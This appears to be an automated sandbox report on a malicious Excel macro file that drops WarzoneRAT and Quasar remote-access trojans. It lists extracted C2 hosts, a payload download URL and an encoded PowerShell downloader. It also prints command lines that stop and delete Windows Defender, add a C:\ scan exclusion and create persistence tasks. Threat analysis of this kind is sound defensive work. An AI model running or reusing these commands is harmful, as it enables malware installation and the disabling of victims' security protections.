Analysis
-
max time kernel
119s -
max time network
155s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
22-12-2021 16:06
Static task
static1
Behavioral task
behavioral1
Sample
d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161.xlsm
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161.xlsm
Resource
win10-en-20211208
General
-
Target
d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161.xlsm
-
Size
73KB
-
MD5
0a2ddcbe4687cf927ba02d332aa2a6d6
-
SHA1
b7fdb409e76495b4bcfb374d68cfcf919fbb4afe
-
SHA256
d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161
-
SHA512
834a3d6ba33aa7693c962dd690d02d6f63cd8ccbda107a60ed844a28d765ffb5f55e3e51d12eeec7059e6ee52866a7db2d0ad7cb4b8b6ebf500725afcf381240
Malware Config
Extracted
https://marks397.co.za/FRE/MAEK.pif
Extracted
warzonerat
jerenyankipong.duckdns.org:5200
Extracted
quasar
1.3.0.0
SUCCESS
jerenyankipong.duckdns.org:4782
MUTEX_jh9iPmixBt74IpSqEj
-
encryption_key
uO9yacYVMmi8921rParX
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
cmd
-
subdirectory
SubDir
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Ikjhyqgjrhtnkeaopbpxoay.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Thunderbird\\thunderbird.exe\"," Ikjhyqgjrhtnkeaopbpxoay.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2076 2648 cmd.exe EXCEL.EXE -
Quasar Payload 8 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe family_quasar C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe family_quasar behavioral2/memory/3896-436-0x0000000000970000-0x00000000009CE000-memory.dmp family_quasar behavioral2/memory/3896-437-0x0000000000970000-0x00000000009CE000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\SubDir\Client.exe family_quasar C:\Users\Admin\AppData\Roaming\SubDir\Client.exe family_quasar behavioral2/memory/3568-503-0x0000000000C10000-0x0000000000C6E000-memory.dmp family_quasar behavioral2/memory/3568-504-0x0000000000C10000-0x0000000000C6E000-memory.dmp family_quasar -
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Nirsoft 5 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe Nirsoft -
Warzone RAT Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1152-348-0x0000000000405CE2-mapping.dmp warzonerat behavioral2/memory/1152-354-0x0000000000400000-0x0000000000554000-memory.dmp warzonerat -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 39 3876 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
Ikjhyqgjrhtnkeaopbpxoay.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeIkjhyqgjrhtnkeaopbpxoay.exeBHpIzmsFC.exeClient.exepid process 1044 Ikjhyqgjrhtnkeaopbpxoay.exe 2052 AdvancedRun.exe 3188 AdvancedRun.exe 4028 AdvancedRun.exe 812 AdvancedRun.exe 1152 Ikjhyqgjrhtnkeaopbpxoay.exe 3896 BHpIzmsFC.exe 3568 Client.exe -
Deletes itself 1 IoCs
Processes:
EXCEL.EXEpid process 2648 EXCEL.EXE -
Loads dropped DLL 6 IoCs
Processes:
Ikjhyqgjrhtnkeaopbpxoay.exepid process 1152 Ikjhyqgjrhtnkeaopbpxoay.exe 1152 Ikjhyqgjrhtnkeaopbpxoay.exe 1152 Ikjhyqgjrhtnkeaopbpxoay.exe 1152 Ikjhyqgjrhtnkeaopbpxoay.exe 1152 Ikjhyqgjrhtnkeaopbpxoay.exe 1152 Ikjhyqgjrhtnkeaopbpxoay.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 2 IoCs
Processes:
Ikjhyqgjrhtnkeaopbpxoay.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ikjhyqgjrhtnkeaopbpxoay.exe Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ikjhyqgjrhtnkeaopbpxoay.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 52 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Ikjhyqgjrhtnkeaopbpxoay.exedescription pid process target process PID 1044 set thread context of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3152 schtasks.exe 2512 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
NTFS ADS 1 IoCs
Processes:
EXCEL.EXEdescription ioc process File created C:\Users\Admin\AppData\Local\Temp\F7C57F00\:Zone.Identifier:$DATA EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2648 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
powershell.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeIkjhyqgjrhtnkeaopbpxoay.exepowershell.exepowershell.exepid process 3876 powershell.exe 3876 powershell.exe 3876 powershell.exe 2052 AdvancedRun.exe 2052 AdvancedRun.exe 2052 AdvancedRun.exe 2052 AdvancedRun.exe 3188 AdvancedRun.exe 3188 AdvancedRun.exe 3188 AdvancedRun.exe 3188 AdvancedRun.exe 4028 AdvancedRun.exe 4028 AdvancedRun.exe 4028 AdvancedRun.exe 4028 AdvancedRun.exe 812 AdvancedRun.exe 812 AdvancedRun.exe 812 AdvancedRun.exe 812 AdvancedRun.exe 1044 Ikjhyqgjrhtnkeaopbpxoay.exe 1044 Ikjhyqgjrhtnkeaopbpxoay.exe 2544 powershell.exe 2544 powershell.exe 2544 powershell.exe 664 powershell.exe 664 powershell.exe 664 powershell.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
EXCEL.EXEpid process 2648 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 14 IoCs
Processes:
powershell.exeIkjhyqgjrhtnkeaopbpxoay.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exepowershell.exepowershell.exeBHpIzmsFC.exeClient.exedescription pid process Token: SeDebugPrivilege 3876 powershell.exe Token: SeDebugPrivilege 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Token: SeDebugPrivilege 2052 AdvancedRun.exe Token: SeImpersonatePrivilege 2052 AdvancedRun.exe Token: SeDebugPrivilege 3188 AdvancedRun.exe Token: SeImpersonatePrivilege 3188 AdvancedRun.exe Token: SeDebugPrivilege 4028 AdvancedRun.exe Token: SeImpersonatePrivilege 4028 AdvancedRun.exe Token: SeDebugPrivilege 812 AdvancedRun.exe Token: SeImpersonatePrivilege 812 AdvancedRun.exe Token: SeDebugPrivilege 2544 powershell.exe Token: SeDebugPrivilege 664 powershell.exe Token: SeDebugPrivilege 3896 BHpIzmsFC.exe Token: SeDebugPrivilege 3568 Client.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 2648 EXCEL.EXE 2648 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
EXCEL.EXEIkjhyqgjrhtnkeaopbpxoay.exeClient.exepid process 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 2648 EXCEL.EXE 1152 Ikjhyqgjrhtnkeaopbpxoay.exe 3568 Client.exe -
Suspicious use of WriteProcessMemory 53 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeIkjhyqgjrhtnkeaopbpxoay.exeAdvancedRun.exeAdvancedRun.exeIkjhyqgjrhtnkeaopbpxoay.exeBHpIzmsFC.exeClient.exedescription pid process target process PID 2648 wrote to memory of 2076 2648 EXCEL.EXE cmd.exe PID 2648 wrote to memory of 2076 2648 EXCEL.EXE cmd.exe PID 2076 wrote to memory of 3876 2076 cmd.exe powershell.exe PID 2076 wrote to memory of 3876 2076 cmd.exe powershell.exe PID 3876 wrote to memory of 1044 3876 powershell.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 3876 wrote to memory of 1044 3876 powershell.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 3876 wrote to memory of 1044 3876 powershell.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 2052 1044 Ikjhyqgjrhtnkeaopbpxoay.exe AdvancedRun.exe PID 1044 wrote to memory of 2052 1044 Ikjhyqgjrhtnkeaopbpxoay.exe AdvancedRun.exe PID 1044 wrote to memory of 2052 1044 Ikjhyqgjrhtnkeaopbpxoay.exe AdvancedRun.exe PID 2052 wrote to memory of 3188 2052 AdvancedRun.exe AdvancedRun.exe PID 2052 wrote to memory of 3188 2052 AdvancedRun.exe AdvancedRun.exe PID 2052 wrote to memory of 3188 2052 AdvancedRun.exe AdvancedRun.exe PID 1044 wrote to memory of 4028 1044 Ikjhyqgjrhtnkeaopbpxoay.exe AdvancedRun.exe PID 1044 wrote to memory of 4028 1044 Ikjhyqgjrhtnkeaopbpxoay.exe AdvancedRun.exe PID 1044 wrote to memory of 4028 1044 Ikjhyqgjrhtnkeaopbpxoay.exe AdvancedRun.exe PID 4028 wrote to memory of 812 4028 AdvancedRun.exe AdvancedRun.exe PID 4028 wrote to memory of 812 4028 AdvancedRun.exe AdvancedRun.exe PID 4028 wrote to memory of 812 4028 AdvancedRun.exe AdvancedRun.exe PID 1044 wrote to memory of 2544 1044 Ikjhyqgjrhtnkeaopbpxoay.exe powershell.exe PID 1044 wrote to memory of 2544 1044 Ikjhyqgjrhtnkeaopbpxoay.exe powershell.exe PID 1044 wrote to memory of 2544 1044 Ikjhyqgjrhtnkeaopbpxoay.exe powershell.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1044 wrote to memory of 1152 1044 Ikjhyqgjrhtnkeaopbpxoay.exe Ikjhyqgjrhtnkeaopbpxoay.exe PID 1152 wrote to memory of 664 1152 Ikjhyqgjrhtnkeaopbpxoay.exe powershell.exe PID 1152 wrote to memory of 664 1152 Ikjhyqgjrhtnkeaopbpxoay.exe powershell.exe PID 1152 wrote to memory of 664 1152 Ikjhyqgjrhtnkeaopbpxoay.exe powershell.exe PID 1152 wrote to memory of 660 1152 Ikjhyqgjrhtnkeaopbpxoay.exe cmd.exe PID 1152 wrote to memory of 660 1152 Ikjhyqgjrhtnkeaopbpxoay.exe cmd.exe PID 1152 wrote to memory of 660 1152 Ikjhyqgjrhtnkeaopbpxoay.exe cmd.exe PID 1152 wrote to memory of 660 1152 Ikjhyqgjrhtnkeaopbpxoay.exe cmd.exe PID 1152 wrote to memory of 660 1152 Ikjhyqgjrhtnkeaopbpxoay.exe cmd.exe PID 1152 wrote to memory of 3896 1152 Ikjhyqgjrhtnkeaopbpxoay.exe BHpIzmsFC.exe PID 1152 wrote to memory of 3896 1152 Ikjhyqgjrhtnkeaopbpxoay.exe BHpIzmsFC.exe PID 1152 wrote to memory of 3896 1152 Ikjhyqgjrhtnkeaopbpxoay.exe BHpIzmsFC.exe PID 3896 wrote to memory of 3152 3896 BHpIzmsFC.exe schtasks.exe PID 3896 wrote to memory of 3152 3896 BHpIzmsFC.exe schtasks.exe PID 3896 wrote to memory of 3152 3896 BHpIzmsFC.exe schtasks.exe PID 3896 wrote to memory of 3568 3896 BHpIzmsFC.exe Client.exe PID 3896 wrote to memory of 3568 3896 BHpIzmsFC.exe Client.exe PID 3896 wrote to memory of 3568 3896 BHpIzmsFC.exe Client.exe PID 3568 wrote to memory of 2512 3568 Client.exe schtasks.exe PID 3568 wrote to memory of 2512 3568 Client.exe schtasks.exe PID 3568 wrote to memory of 2512 3568 Client.exe schtasks.exe -
outlook_office_path 1 IoCs
Processes:
Ikjhyqgjrhtnkeaopbpxoay.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ikjhyqgjrhtnkeaopbpxoay.exe -
outlook_win_path 1 IoCs
Processes:
Ikjhyqgjrhtnkeaopbpxoay.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Ikjhyqgjrhtnkeaopbpxoay.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161.xlsm"1⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Uzosupxyvem.bat2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBJAGsAagBoAHkAcQBnAGoAcgBoAHQAbgBrAGUAYQBvAHAAYgBwAHgAbwBhAHkALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcABzADoALwAvAG0AYQByAGsAcwAzADkANwAuAGMAbwAuAHoAYQAvAEYAUgBFAC8ATQBBAEUASwAuAHAAaQBmACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Users\Admin\AppData\Roaming\Ikjhyqgjrhtnkeaopbpxoay.exe"C:\Users\Admin\AppData\Roaming\Ikjhyqgjrhtnkeaopbpxoay.exe"4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 20526⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
-
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 4101d8 40286⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:812
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\Ikjhyqgjrhtnkeaopbpxoay.exe" -Force5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Users\Admin\AppData\Local\Temp\Ikjhyqgjrhtnkeaopbpxoay.exeC:\Users\Admin\AppData\Local\Temp\Ikjhyqgjrhtnkeaopbpxoay.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe"6⤵PID:660
-
-
C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe"C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cmd" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\BHpIzmsFC.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:3152
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "cmd" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
PID:2512
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
224eab1ee8f8bbf6b4683fb79b6055d1
SHA133cd2fdabbbc241411b813a9a27004ac36e750c1
SHA2569adb51554502af88dcce67501fcf525760236a704332e44775d00cd132c23032
SHA5128b2cfe4959f86f2f67e64d98c44ffd8bb8f9fc04a3a7cad4b8a07d313efb5269ee6986d13c7cfe08e9867bcd70f486c9e60880e78b0d15ab788d4b2075d049a6
-
MD5
81089ac5e84830e4ed42972b8a4c1669
SHA1447052cc74930cfb4388952465eb3874714ad1e0
SHA256b867bb8eb79ae78b9095c540cce72c10bea7c97d34b28d6ea8a06a0ffbd48efd
SHA51216589ca480413d23c854ceb3f64b4927bc221cf08a13a2c8bc4e7d69e06efe03ac73ed9edb6a9a8cd082636fea8d2af97d17d4ecc7b3fe4663c8e56d9642acb2
-
MD5
c63e55d993a26d3cf2aad99de2671b41
SHA1d42507390e70ea9b85d72bc1f452862ff2efe7cd
SHA256428ced58aad58048afec9301edf473ebb0dc07639c16c6ddeec910137bd1fb91
SHA51221c636e6e063aab2d0c4409be8c0bb44ad4dcda28a846a4d9ae371e9010f4f2c58a7d781161320c0222d07ad437125bf68aa78cdfb98cea279375472d4fcfc77
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
17fc12902f4769af3a9271eb4e2dacce
SHA19a4a1581cc3971579574f837e110f3bd6d529dab
SHA25629ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b
SHA512036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a
-
MD5
6d5f00a23f0fc84d7e44a9dbcd31e0b4
SHA1fcfe53ac6c4727a7d711415632882fc7f5569491
SHA256343547ccd4990682ba60ae259bf210c4a1078e3de6cee1fcfa48d345d83e23e5
SHA51215cc6af9e8492358ee9041ddb709a87e64723ee41d775ca17ac63a6c1725b006f893313c5cb4bd1cc237dcce6d410900485cd62aa9f4075d308829e1e6994236
-
MD5
6d5f00a23f0fc84d7e44a9dbcd31e0b4
SHA1fcfe53ac6c4727a7d711415632882fc7f5569491
SHA256343547ccd4990682ba60ae259bf210c4a1078e3de6cee1fcfa48d345d83e23e5
SHA51215cc6af9e8492358ee9041ddb709a87e64723ee41d775ca17ac63a6c1725b006f893313c5cb4bd1cc237dcce6d410900485cd62aa9f4075d308829e1e6994236
-
MD5
7411c8d36761ca9edc88373cfc7a3cb7
SHA18b31d6b61ee03da19817d3ffd59c0aa41ef32d81
SHA2565ab1aac03c053e025319aac9bbe317a163d56bf4657819c6a43ffb97099ec322
SHA51237f29a792ca641f29144032575f7f42ced5345c541cbdad33e935ef7b5b70d6b5623196596587be95ef00a86a58d604c295c1fcc4a9b159b80cc273fe1623342
-
MD5
7411c8d36761ca9edc88373cfc7a3cb7
SHA18b31d6b61ee03da19817d3ffd59c0aa41ef32d81
SHA2565ab1aac03c053e025319aac9bbe317a163d56bf4657819c6a43ffb97099ec322
SHA51237f29a792ca641f29144032575f7f42ced5345c541cbdad33e935ef7b5b70d6b5623196596587be95ef00a86a58d604c295c1fcc4a9b159b80cc273fe1623342
-
MD5
6d5f00a23f0fc84d7e44a9dbcd31e0b4
SHA1fcfe53ac6c4727a7d711415632882fc7f5569491
SHA256343547ccd4990682ba60ae259bf210c4a1078e3de6cee1fcfa48d345d83e23e5
SHA51215cc6af9e8492358ee9041ddb709a87e64723ee41d775ca17ac63a6c1725b006f893313c5cb4bd1cc237dcce6d410900485cd62aa9f4075d308829e1e6994236
-
MD5
6d5f00a23f0fc84d7e44a9dbcd31e0b4
SHA1fcfe53ac6c4727a7d711415632882fc7f5569491
SHA256343547ccd4990682ba60ae259bf210c4a1078e3de6cee1fcfa48d345d83e23e5
SHA51215cc6af9e8492358ee9041ddb709a87e64723ee41d775ca17ac63a6c1725b006f893313c5cb4bd1cc237dcce6d410900485cd62aa9f4075d308829e1e6994236
-
MD5
7411c8d36761ca9edc88373cfc7a3cb7
SHA18b31d6b61ee03da19817d3ffd59c0aa41ef32d81
SHA2565ab1aac03c053e025319aac9bbe317a163d56bf4657819c6a43ffb97099ec322
SHA51237f29a792ca641f29144032575f7f42ced5345c541cbdad33e935ef7b5b70d6b5623196596587be95ef00a86a58d604c295c1fcc4a9b159b80cc273fe1623342
-
MD5
7411c8d36761ca9edc88373cfc7a3cb7
SHA18b31d6b61ee03da19817d3ffd59c0aa41ef32d81
SHA2565ab1aac03c053e025319aac9bbe317a163d56bf4657819c6a43ffb97099ec322
SHA51237f29a792ca641f29144032575f7f42ced5345c541cbdad33e935ef7b5b70d6b5623196596587be95ef00a86a58d604c295c1fcc4a9b159b80cc273fe1623342
-
MD5
939c6b2fd5c13b7d43b15ba483e98d50
SHA184a1cd7972626d0e113ec48961040d3878b97eda
SHA2567dff5e8feb91f4e9e7b42d12f5ab8d1e380dc0c6f1c0d5bc3fa84c6f0eb55f68
SHA512f482c070c781cd1f2929baa6904b2e896c834ba0f96bcedca86733430161316caba4a2631845e5a9dd2418481bcb4935f30ba423bc29270a5313d3a5288789a9
-
MD5
ef12ab9d0b231b8f898067b2114b1bc0
SHA16d90f27b2105945f9bb77039e8b892070a5f9442
SHA2562b00fc4f541ac10c94e3556ff28e30a801811c36422546a546a445aca3f410f7
SHA5122aa62bfba556ad8f042942dd25aa071ff6677c257904377c1ec956fd9e862abcbf379e0cfd8c630c303a32ece75618c24e3eef58bddb705c427985b944689193
-
MD5
75f8cc548cabf0cc800c25047e4d3124
SHA1602676768f9faecd35b48c38a0632781dfbde10c
